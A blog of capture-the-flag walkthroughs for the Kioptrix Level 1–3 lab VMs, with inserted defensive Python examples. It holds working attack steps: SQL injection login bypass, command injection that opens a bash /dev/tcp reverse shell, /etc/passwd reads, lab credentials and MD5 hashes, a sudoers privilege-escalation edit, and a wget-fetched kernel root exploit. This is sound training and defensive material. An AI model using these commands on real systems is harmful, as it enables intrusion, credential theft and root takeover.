Monday, November 4, 2013

Kioptrix Level 3 - Walkthrough

It's definitely getting more difficult. Let's see. The NMAP scan showed the following:

root@kali:~# nmap -sS -A 192.168.1.20

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-03 22:04 CET
Nmap scan report for 192.168.1.20
Host is up (0.00062s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:17:F3:43 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.62 ms 192.168.1.20

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.96 seconds

I went to the website, and after some navigation I found that it's running the LotusCMS web application.


I found two exploits on exploit-db: one of them was for Metasploit, which I didn't want to use (although I tried the exploit and it worked), and the other didn't work. I found another one, which is a bash script version of the Metasploit exploit:


It worked really nicely, and I got a reverse shell:



About to try and inject reverse shell....
what IP to use?
192.168.1.17
What PORT?
4444

OK, open your local listener and choose the method for back connect:
1) NetCat -e        3) NetCat Backpipe    5) Exit
2) NetCat /dev/tcp  4) NetCat FIFO
#? 1

---------------------------

root@kali:~# nc -lvvnp 4444
listening on [any] 4444 ...
connect to [192.168.1.17] from (UNKNOWN) [192.168.1.20] 59701
python -c 'import pty;pty.spawn("/bin/sh")'
$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ pwd
pwd
/home/www/kioptrix3.com

I tried quite a few local privilege escalation exploits, but none of them worked.

I did some further enumeration and found that there is an interesting file which has the suid bit set (/usr/local/bin/ht).

$ find / -perm -u=s -type f 2>/dev/null     
find / -perm -u=s -type f 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/apache2/suexec
/usr/lib/pt_chown
/usr/bin/arping
/usr/bin/mtr
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/at
/usr/bin/sudoedit
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/traceroute6.iputils
/usr/local/bin/ht
/usr/sbin/pppd
/usr/sbin/uuidd
/lib/dhcp3-client/call-dhclient-script
/bin/fusermount
/bin/ping
/bin/mount
/bin/umount
/bin/ping6
/bin/su

However, I couldn't run it from here, because I didn't have full terminal access. I need SSH! Argh...
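A baseline check like the one below is how a defender catches the same oddity the `find` listing above surfaced. It is an added example, not code from the post; its BASELINE allowlist is an assumption (the listing above minus the locally installed editor), and a real deployment would generate that allowlist from a known-good build.

```python
"""Baseline check for SUID binaries (added example, not from the original post).

SAMPLE_FIND_OUTPUT is the `find / -perm -u=s -type f` listing shown above,
embedded as constructed input so the script runs offline. BASELINE is an
assumed allowlist of what a clean install of this host ships SUID.
"""
import subprocess

SAMPLE_FIND_OUTPUT = """\
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/apache2/suexec
/usr/lib/pt_chown
/usr/bin/arping
/usr/bin/mtr
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/at
/usr/bin/sudoedit
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/traceroute6.iputils
/usr/local/bin/ht
/usr/sbin/pppd
/usr/sbin/uuidd
/lib/dhcp3-client/call-dhclient-script
/bin/fusermount
/bin/ping
/bin/mount
/bin/umount
/bin/ping6
/bin/su
"""

# Assumed allowlist: the listing above minus the locally added editor, so the
# audit shows what a real baseline diff would surface on this host.
BASELINE = frozenset(
    p for p in SAMPLE_FIND_OUTPUT.split() if p != "/usr/local/bin/ht"
)

# Distributions do not install SUID binaries under locally managed or
# world-writable trees, so a SUID file there deserves the most attention.
HIGH_RISK_PREFIXES = ("/usr/local/", "/opt/", "/home/", "/tmp/", "/var/tmp/", "/dev/shm/")


def parse_find_output(text):
    """Return the absolute paths from a `find` listing, ignoring noise lines."""
    return [line.strip() for line in text.splitlines() if line.strip().startswith("/")]


def audit_suid(paths, baseline=BASELINE):
    """Compare found SUID files with the baseline.

    Returns (unexpected, missing): unexpected files are new SUID binaries that
    need an explanation; missing ones can mean a hardening change or a
    tampered system binary, so they are reported as well.
    """
    found = set(paths)
    return sorted(found - baseline), sorted(baseline - found)


def severity(path):
    """'high' for SUID files where no package manager would put them, else 'review'."""
    return "high" if path.startswith(HIGH_RISK_PREFIXES) else "review"


def collect_live_suid():
    """Run the same find command on the local host; unreadable directories
    only produce stderr noise, which is discarded."""
    proc = subprocess.run(
        ["find", "/", "-perm", "-u=s", "-type", "f"],
        capture_output=True, text=True, check=False,
    )
    return parse_find_output(proc.stdout)


if __name__ == "__main__":
    unexpected, missing = audit_suid(parse_find_output(SAMPLE_FIND_OUTPUT))
    for path in unexpected:
        print(f"[{severity(path)}] unexpected SUID binary: {path}")
    for path in missing:
        print(f"[review] baseline SUID binary absent: {path}")
```

Replace the sample input with `collect_live_suid()` to audit a real host against a baseline taken from a clean build.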

I moved on to do some further enumeration. In the passwd file I found 2 other normal users (besides root):

root:x:0:0:root:/root:/bin/bash
loneferret:x:1000:100:loneferret,,,:/home/loneferret:/bin/bash
dreg:x:1001:1001:Dreg Gevans,0,555-5566,:/home/dreg:/bin/rbash

I looked at the webapp configs hoping I would find a password for the MySQL database on the system. I found it in the gconfig.php file:


www-data@Kioptrix3:/home/www/kioptrix3.com/gallery$ cat gconfig.php
cat gconfig.php
<?php
    error_reporting(0);
    /*
        A sample Gallarific configuration file. You should edit
        the installer details below and save this file as gconfig.php
        Do not modify anything else if you don't know what it is.
    */

    // Installer Details -----------------------------------------------

    // Enter the full HTTP path to your Gallarific folder below,
    // such as http://www.yoursite.com/gallery
    // Do NOT include a trailing forward slash

    $GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";

    $GLOBALS["gallarific_mysql_server"] = "localhost";
    $GLOBALS["gallarific_mysql_database"] = "gallery";
    $GLOBALS["gallarific_mysql_username"] = "root";
    $GLOBALS["gallarific_mysql_password"] = "fuckeyou";

    // Setting Details -------------------------------------------------

if(!$g_mysql_c = @mysql_connect($GLOBALS["gallarific_mysql_server"], $GLOBALS["gallarific_mysql_username"], $GLOBALS["gallarific_mysql_password"])) {
        echo("A connection to the database couldn't be established: " . mysql_error());
        die();
}else {
    if(!$g_mysql_d = @mysql_select_db($GLOBALS["gallarific_mysql_database"], $g_mysql_c)) {
        echo("The Gallarific database couldn't be opened: " . mysql_error());
        die();
    }else {
        $settings=mysql_query("select * from gallarific_settings");
        if(mysql_num_rows($settings)!=0){
            while($data=mysql_fetch_array($settings)){
                $GLOBALS["{$data['settings_name']}"]=$data['settings_value'];
            }
        }
   
    }
}

?>
www-data@Kioptrix3:/home/www/kioptrix3.com/gallery$

I logged in to the database and after browsing the tables, I found passwords for the two users on the machine.


mysql> select * from gallarific_users
select * from gallarific_users
    -> ;
;
+--------+----------+----------+-----------+-----------+----------+-------+------------+---------+-------------+-------+----------+
| userid | username | password | usertype  | firstname | lastname | email | datejoined | website | issuperuser | photo | joincode |
+--------+----------+----------+-----------+-----------+----------+-------+------------+---------+-------------+-------+----------+
|      1 | admin    | n0t7t1k4 | superuser | Super     | User     |       | 1302628616 |         |           1 |       |          |
+--------+----------+----------+-----------+-----------+----------+-------+------------+---------+-------------+-------+----------+
1 row in set (0.01 sec)

mysql> select * from dev_accounts
select * from dev_accounts
    -> ;
;
+----+------------+----------------------------------+
| id | username   | password                         |
+----+------------+----------------------------------+
|  1 | dreg       | 0d3eccfb887aabd50f243b3f155c0f85 |
|  2 | loneferret | 5badcaf789d3d1d09794d8f021f40f0e |
+----+------------+----------------------------------+
2 rows in set (0.00 sec)

mysql>

After doing a Google search I found the passwords for the MD5 hashes:

md5(Mast3r) = 0d3eccfb887aabd50f243b3f155c0f85
md5(starwars) = 5badcaf789d3d1d09794d8f021f40f0e
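What the lookup above relies on, and the fix, as an added example (not the post's or Gallarific's code): the stored values are unsalted MD5, so every user with the same password shares one searchable digest; the replacement below uses PBKDF2-HMAC-SHA256 from the standard library, with an assumed iteration count and an assumed storage format.

```python
"""Unsalted MD5 versus a salted, iterated hash (added example for this post).

DEV_ACCOUNTS mirrors the dev_accounts rows shown above. ITERATIONS and the
"pbkdf2_sha256$iters$salt$dk" string layout are assumptions for illustration.
"""
import hashlib
import hmac
import os

# Constructed sample copied from the dev_accounts table above.
DEV_ACCOUNTS = {
    "dreg": "0d3eccfb887aabd50f243b3f155c0f85",
    "loneferret": "5badcaf789d3d1d09794d8f021f40f0e",
}

ITERATIONS = 600_000  # assumed; tune so one hash costs ~100 ms on the server


def md5_hex(password):
    """Unsalted MD5 as the gallery stored it: the same password always yields
    the same 32-hex-char digest, so a single search-engine hit resolves every
    user who picked that password."""
    return hashlib.md5(password.encode()).hexdigest()


def md5_matches(stored_hex, candidate):
    """Verify a login against a legacy MD5 row in constant time."""
    return hmac.compare_digest(md5_hex(candidate), stored_hex)


def pbkdf2_hash(password, salt=None, iterations=ITERATIONS):
    """Salted, iterated hash in a self-describing string.

    A fresh 16-byte salt per user means identical passwords no longer share a
    digest, and the iteration count makes each guess expensive.
    """
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def pbkdf2_verify(stored, candidate):
    """Recompute with the stored salt and iteration count, compare in constant time."""
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", candidate.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


def migrate_on_login(user, candidate, table=DEV_ACCOUNTS):
    """Upgrade path for an existing table: when a user logs in with a password
    that still matches the legacy MD5 row, rehash it with PBKDF2 and replace
    the row, so the weak digests disappear as users log in."""
    stored = table[user]
    if "$" not in stored:  # legacy unsalted MD5 row
        if not md5_matches(stored, candidate):
            return False
        table[user] = pbkdf2_hash(candidate)
        return True
    return pbkdf2_verify(stored, candidate)


if __name__ == "__main__":
    a = pbkdf2_hash("starwars")
    b = pbkdf2_hash("starwars")
    print("same password, different stored values:", a != b)
    print("verify:", pbkdf2_verify(a, "starwars"), pbkdf2_verify(a, "Starwars"))
```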

It turned out that both passwords were working on SSH as well. The better account was "loneferret". After logging in I found that this user can run the "ht" editor with root privileges.


I could open the shadow file:


But it takes a lot of time to find the password for root. I could open the sudoers file:


This is a very poor editor, it works only in hex, so the simplest option was to modify the line:

loneferret ALL=NOPASSWD:  !/usr/bin/su, /usr/local/bin/ht
to
loneferret ALL=NOPASSWD:      /bin/su, /usr/local/bin/ht 

That means that I can run the "su" command as well, without a password.


After saving, I could run "sudo su", and I got root access.
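A sudoers audit that flags exactly this kind of rule, as an added example that is not part of the original post: the sample file is constructed around the loneferret line above, and ROOT_EQUIVALENT is an assumed short list of programs whose execution as root is equivalent to root.

```python
"""Audit sudoers rules for grants that amount to full root (added example).

SAMPLE_SUDOERS is constructed: the loneferret rule from the post plus two
ordinary lines for contrast. ROOT_EQUIVALENT is an assumed, deliberately short
list; a real audit would use a maintained one.
"""
import os
import re
from dataclasses import dataclass

SAMPLE_SUDOERS = """\
# constructed sample /etc/sudoers
Defaults    env_reset
root        ALL=(ALL) ALL
loneferret  ALL=NOPASSWD:  !/usr/bin/su, /usr/local/bin/ht
backup      ALL=(root) /usr/bin/rsync
"""

# Editors, pagers and copy tools run as root can read /etc/shadow and rewrite
# /etc/sudoers itself, so granting one is granting root whatever else the
# rule says (the post's sudoers edit is exactly that).
ROOT_EQUIVALENT = {"ht", "vi", "vim", "nano", "emacs", "less", "more",
                   "tee", "cp", "dd", "sh", "bash"}

# user  hosts=(runas) TAG: TAG: cmd, cmd
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<hosts>\S+?)=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+?)\s*$"
)
SKIP_PREFIXES = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")


@dataclass
class Finding:
    user: str
    command: str
    severity: str
    reason: str


def parse_rules(text):
    """Yield (user, tags, [commands]) for each user specification line."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = set(m["tags"].replace(" ", "").rstrip(":").split(":")) - {""}
        cmds = [c.strip() for c in m["cmds"].split(",") if c.strip()]
        yield m["user"], tags, cmds


def audit_sudoers(text):
    """Return Findings for negated commands, unrestricted grants and
    root-equivalent programs; NOPASSWD raises a root-equivalent grant to critical."""
    findings = []
    for user, tags, cmds in parse_rules(text):
        nopasswd = "NOPASSWD" in tags  # a tag applies to every command after it
        for cmd in cmds:
            if cmd.startswith("!"):
                findings.append(Finding(user, cmd, "medium",
                    "'!' only removes what another rule grants; it is not a "
                    "restriction, and sudoers(5) warns that subtracting "
                    "commands is easily bypassed"))
                continue
            prog = os.path.basename(cmd.split()[0])
            if cmd == "ALL" and user != "root":
                findings.append(Finding(user, cmd, "high", "unrestricted command set"))
            elif prog in ROOT_EQUIVALENT:
                findings.append(Finding(
                    user, cmd, "critical" if nopasswd else "high",
                    f"{prog} runs as root and can read or write any file, "
                    "including /etc/sudoers"
                    + (" (no password required)" if nopasswd else "")))
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"[{f.severity}] {f.user}: {f.command}: {f.reason}")
```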


Sunday, November 3, 2013

Kioptrix Level 2 - Walkthrough

So, Level 1 was way too easy; Level 2 was a little bit trickier, but also not hard. I found it more interesting. Let's see:

The detailed NMAP scan results were the following:

root@kali:~# nmap -sS -A 192.168.1.19

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-03 08:15 CET
Nmap scan report for 192.168.1.19
Host is up (0.00035s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
|_sshv1: Server supports SSHv1
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind  2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            623/udp  status
|_  100024  1            626/tcp  status
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-07T23:10:47+00:00
|_Not valid after:  2010-10-07T23:10:47+00:00
|_ssl-date: 2013-11-03T04:05:56+00:00; -3h09m48s from local time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
631/tcp  open  ipp      CUPS 1.1
| http-methods: Potentially risky methods: PUT
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: 403 Forbidden
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:0C:29:91:C9:95 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.35 ms 192.168.1.19

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.82 seconds

Again, I went for the webserver (I don't hate webservers or anything :)). This time I got to an interesting webpage (on L1 it was only a default HTML page). It was a login page, and I tried a simple SQL injection; from the NMAP scan I knew the server is running MySQL, so that helped. I used:

admin' OR 1=1 #


and it let me in, and I got to a page where I could execute the ping command.
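The bypass beside the fix, as an added example (not the Kioptrix PHP code): the login query built by string concatenation next to the same query with bind parameters, run against a constructed sqlite3 table. sqlite3 understands the SQL `-- ` comment but not MySQL's `#`, so the payload is written with `-- ` here; its effect on the WHERE clause is the same.

```python
"""String-built login query versus a parameterised one (added example).

The users table is constructed in memory; the admin password is a placeholder.
"""
import sqlite3

SCHEMA = """
CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT NOT NULL);
INSERT INTO users VALUES ('admin', 'constructed-secret');
"""

# The page's payload uses MySQL's '#' comment; sqlite3 needs '-- ' instead.
PAYLOAD = "admin' OR 1=1 -- "


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def rendered_query(username, password):
    """The SQL text an unsafe login builds: the username is pasted into the
    statement, so a quote ends the literal and the rest becomes SQL."""
    return (f"SELECT username FROM users WHERE username = '{username}' "
            f"AND password = '{password}'")


def login_vulnerable(conn, username, password):
    """As in the original form: returns True for the payload with any password,
    because OR 1=1 is true for every row and the comment drops the password check."""
    return conn.execute(rendered_query(username, password)).fetchone() is not None


def login_parameterised(conn, username, password):
    """Same query with bind parameters: the driver sends the values separately
    from the statement text, so the input can only ever be compared as data."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    print(rendered_query(PAYLOAD, "anything"))
    print("vulnerable:", login_vulnerable(db, PAYLOAD, "anything"))
    print("parameterised:", login_parameterised(db, PAYLOAD, "anything"))
```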


As the output of the command looked like system output, I thought that I could append other commands to it in order to execute arbitrary commands. It turned out that I was right, and I could read files, or even open a reverse shell back to my computer. Some nice tricks to get a reverse shell:


Commands used on the page:

192.168.1.1;cat /etc/passwd
192.168.1.1;bash -i >& /dev/tcp/192.168.1.17/4444 0>&1
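How the ping form should have handled its input, as an added example rather than the page's code: parse the field as an IP address (an allowlist, not a blocklist of metacharacters) and invoke ping with an argv list, never through a shell. The `vulnerable_command_line` helper only renders the string an unsafe implementation would hand to the shell; what the real PHP page ran is an assumption.

```python
"""Safe handling for a "ping this host" form, with the injectable form beside
it for contrast (added example for this walkthrough).

SAMPLE_INPUTS is constructed: the two payloads from the page plus benign and
option-injection cases.
"""
import ipaddress
import re
import subprocess

SAMPLE_INPUTS = [
    "192.168.1.1",
    "192.168.1.1;cat /etc/passwd",
    "192.168.1.1;bash -i >& /dev/tcp/192.168.1.17/4444 0>&1",
    "2001:db8::1",
    "-c 1000000 192.168.1.1",
]

# Characters that change meaning inside a shell command line. Used only for
# alerting on rejected input; the allowlist below is what actually protects.
SHELL_META = re.compile(r"[;&|`$<>\n\r(){}\\]")


def vulnerable_command_line(raw):
    """Assumed shape of the original form's command: the field is pasted into a
    shell string, so ';' ends ping and starts whatever follows."""
    return f"ping -c 1 {raw}"


def validate_ping_target(raw):
    """Return the canonical IP string, or None unless the input is exactly one
    IPv4/IPv6 address. Nothing else gets through, so there is nothing for a
    shell to interpret and no option injection via a leading '-'."""
    try:
        return str(ipaddress.ip_address(raw.strip()))
    except ValueError:
        return None


def looks_like_injection(raw):
    """Detection side: a rejected input carrying shell metacharacters is worth
    an alert rather than a silent 400."""
    return SHELL_META.search(raw) is not None


def build_ping_argv(target):
    """argv for ping with shell=False; the validated target is one argument."""
    return ["ping", "-c", "1", target]


def handle_request(raw):
    """Web-handler logic: validate, then run ping without a shell."""
    target = validate_ping_target(raw)
    if target is None:
        return {"status": 400, "alert": looks_like_injection(raw)}
    proc = subprocess.run(build_ping_argv(target), capture_output=True,
                          text=True, check=False)
    return {"status": 200, "output": proc.stdout}


if __name__ == "__main__":
    for raw in SAMPLE_INPUTS:
        target = validate_ping_target(raw)
        print(f"{raw!r}: accepted={target!r} alert={looks_like_injection(raw)}")
```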



After getting a shell on the victim, I saw that I was running with "apache" privileges.

root@kali:~# nc -lvvnp 4444
listening on [any] 4444 ...
connect to [192.168.1.17] from (UNKNOWN) [192.168.1.19] 32771
bash: no job control in this shellbash-3.00$
bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-3.00$ pwd
/var/www/html
bash-3.00$ uname -r
2.6.9-55.EL

Before I got root, I did some enumeration (most important!!!) and revealed some interesting stuff; it didn't lead to a root account, but it was still useful.

From the webpage source I could retrieve a MySQL login password:

bash-3.00$ cat index.php
<?php
    mysql_connect("localhost", "john", "hiroshima") or die(mysql_error());
(...)

I could log in to MySQL, but my shell wasn't fully interactive, so I executed a one-line Python script to make it fully interactive:

python -c 'import pty;pty.spawn("/bin/sh")'

bash-3.00$ python -c 'import pty;pty.spawn("/bin/sh")'
sh-3.00$ mysql -u john -p
mysql -u john -p
Enter password: hiroshima

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 22969 to server version: 4.1.22

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql>

mysql> select * from user;
select * from user;
+-----------------------+------+------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+
| Host                  | User | Password         | Select_priv | Insert_priv | Update_priv | Delete_priv | Create_priv | Drop_priv | Reload_priv | Shutdown_priv | Process_priv | File_priv | Grant_priv | References_priv | Index_priv | Alter_priv | Show_db_priv | Super_priv | Create_tmp_table_priv | Lock_tables_priv | Execute_priv | Repl_slave_priv | Repl_client_priv | ssl_type | ssl_cipher | x509_issuer | x509_subject | max_questions | max_updates | max_connections |
+-----------------------+------+------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+
| localhost             | root | 5a6914ba69e02807 | Y           | Y           | Y           | Y           | Y           | Y         | Y           | Y             | Y            | Y         | Y          | Y               | Y          | Y          | Y            | Y          | Y                     | Y                | Y            | Y               | Y                |          |            |             |              |             0 |           0 |               0 |
| localhost.localdomain | root | 5a6914ba69e02807 | Y           | Y           | Y           | Y           | Y           | Y         | Y           | Y             | Y            | Y         | Y          | Y               | Y          | Y          | Y            | Y          | Y                     | Y                | Y            | Y               | Y                |          |            |             |              |             0 |           0 |               0 |
| localhost.localdomain |      |                  | N           | N           | N           | N           | N           | N         | N           | N             | N            | N         | N          | N               | N          | N          | N            | N          | N                     | N                | N            | N               | N                |          |            |             |              |             0 |           0 |               0 |
| localhost             |      |                  | N           | N           | N           | N           | N           | N         | N           | N             | N            | N         | N          | N               | N          | N          | N            | N          | N                     | N                | N            | N               | N                |          |            |             |              |             0 |           0 |               0 |
| localhost             | john | 5a6914ba69e02807 | Y           | Y           | Y           | Y           | N           | N         | N           | N             | N            | N         | N          | N               | N          | N          | N            | N          | N                     | N                | N            | N               | N                |          |            |             |              |             0 |           0 |               0 |
+-----------------------+------+------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+
5 rows in set (0.00 sec)

mysql> exit
exit
Bye
sh-3.00$ mysql -u root -p
mysql -u root -p
Enter password: hiroshima

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 22971 to server version: 4.1.22

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

As you can see above, I could query the MySQL user table. The password hashes for root and john are the same, so knowing john's password already gave me the root password for the database.

This is nice, but I'm still not root (at least not on the system). After looking at the Linux kernel version, a quick Google search gave the exploit as the first hit:

Linux Kernel 2.6 < 2.6.19 (32bit) ip_append_data() ring0 Root Exploit

After downloading it, I copied it to the victim with wget, compiled it and finally ran it, and again I got root.

sh-3.00$ uname -r
uname -r
2.6.9-55.EL
sh-3.00$ wget http://192.168.1.17/0x82-CVE-2009-2698.c
wget http://192.168.1.17/0x82-CVE-2009-2698.c
--01:33:26--  http://192.168.1.17/0x82-CVE-2009-2698.c
           => `0x82-CVE-2009-2698.c'
Connecting to 192.168.1.17:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,645 (2.6K) [text/x-csrc]

100%[====================================>] 2,645         --.--K/s            

01:33:26 (813.29 KB/s) - `0x82-CVE-2009-2698.c' saved [2645/2645]

sh-3.00$ gcc -o 0x82-CVE-2009-2698 0x82-CVE-2009-2698.c && ./0x82-CVE-2009-2698
gcc -o 0x82-CVE-2009-2698 0x82-CVE-2009-2698.c && ./0x82-CVE-2009-2698
sh-3.00# id
id
uid=0(root) gid=0(root) groups=48(apache)


I found this level more interesting, because of the special web application.

Kioptrix - What is that?

I just started the Kioptrix walkthroughs, but I realized that I didn't mention what they are. So if someone doesn't know: Kioptrix has 4 challenges released as 4 different virtual machines, and the goal is to gain root on each VM. Each level should be harder than the previous one.

The website: http://www.kioptrix.com/

I haven't had a chance to practice or do such things since I finished PWB / OSCP in May, so I thought it would be good to do these sorts of ethical hacking challenges again. My plan for now is to go through the Kioptrix ones and Metasploitable. I won't have time for others now, but I hope to do them later.

g0tmi1k has a very good collection of all kinds of challenges, which can be found here:
http://blog.g0tmi1k.com/2011/03/vulnerable-by-design.html

Saturday, November 2, 2013

Kioptrix Level 1 - Walkthrough

I started by loading the VM on the same network as my Kali Linux box. Then I ran a ping scan on the network, because I didn't know what IP the VM got.

root@kali:~# nmap -P0 192.168.1.0/24

(...)

Nmap scan report for 192.168.1.104
Host is up (0.00051s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
443/tcp  open  https
1024/tcp open  kdm
MAC Address: 00:0C:29:02:82:DB (VMware)

(...)


After I found the host, I did a more exhaustive TCP SYN scan on it.

root@kali:~# nmap -sS -A 192.168.1.104

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-02 20:04 CET

Nmap scan report for 192.168.1.104
Host is up (0.00048s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1           1024/tcp  status
|_  100024  1           1024/udp  status
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/http    Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T08:32:06+00:00
|_Not valid after:  2010-09-26T08:32:06+00:00
|_ssl-date: 2013-11-02T20:07:02+00:00; +1h01m50s from local time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:02:82:DB (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:

|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>

TRACEROUTE

HOP RTT     ADDRESS
1   0.48 ms 192.168.1.104

From the above list we can see that we have a bunch of pretty old services. I did a Google search for the Apache version, and came across the following exploit:

Apache OpenSSL Remote Exploit (Multiple Targets) (OpenFuckV2.c)
http://www.exploit-db.com/exploits/764/

